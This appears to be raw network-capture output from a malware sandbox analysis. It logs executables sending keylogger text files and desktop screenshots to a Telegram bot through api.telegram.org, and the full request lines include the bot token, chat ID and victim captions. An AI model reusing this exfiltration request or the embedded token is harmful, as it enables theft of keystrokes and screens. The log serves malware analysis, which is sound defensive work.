                                                                                      2024-11-27 19:47:50 UTC547INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 37 33 36 38 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":3549,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736870,"document":{"file_name":"KeyD


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.549803149.154.167.2204434676C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:47:52 UTC556OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 2515
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:52 UTC2515OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 4d 49 66 77 66 67 65 44 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 31 34 3a 34 37 3a 30 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 31 34 3a 34 37 3a 30 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 31 34 3a 34 37 3a 30 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataMIfwfgeD.txt"Content-Type: application/octet-stream[14:47:06]<<Program Manager>>[14:47:06]<<Program Manager>>[14:47:06]<<Program Mana
                                                                                      2024-11-27 19:47:52 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:52 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 547
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-27 19:47:52 UTC547INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 37 33 36 38 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":3551,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736872,"document":{"file_name":"KeyD


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.549805149.154.167.2204434848C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:47:57 UTC559OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 6e 45 71 7a 78 64 55 51 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotnEqzxdUQ.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:57 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:47:57 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:48:15 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:48:15 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 552
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.549806149.154.167.2204434676C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:48:00 UTC559OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 79 72 4c 6c 76 45 64 6c 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotyrLlvEdl.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
